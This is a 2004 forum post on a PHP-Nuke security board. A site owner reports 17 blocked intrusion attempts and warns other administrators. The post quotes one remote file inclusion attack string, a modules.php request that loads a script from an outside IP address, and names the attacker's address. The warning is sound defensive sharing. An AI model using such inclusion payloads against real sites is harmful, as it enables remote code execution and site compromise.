Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Another one to look out for
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
ladysilver
Hangin' Around



Joined: May 03, 2004
Posts: 49
Location: Cyberspace
PostPosted: Fri Jul 02, 2004 9:27 am Reply with quote
Got 17 attempts to hack into one of my sites today using this:

modules.php?name=http://211.78.137.195/In_chk.inc

The url is a link to a script. The server is Apache (looks like a temp job set up for hacking purposes), adsl-211-78-137-195.NH.sparqnet.net, open on port 80, ttl 227 is pretty much all I could get on the server. I have all the whois info on this IP and the one below.

The persistent kiddie was 64.106.152.130, all 17 attempts blocked by Sentinel. It looks like he/she was using a favorite trick of opening several windows to keep on the site to perisst after banning.

If you're not using Sentinel or some other site protection, you may want to block this joker in advance.
 
View user's profile Send private message Visit poster's website ICQ Number
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©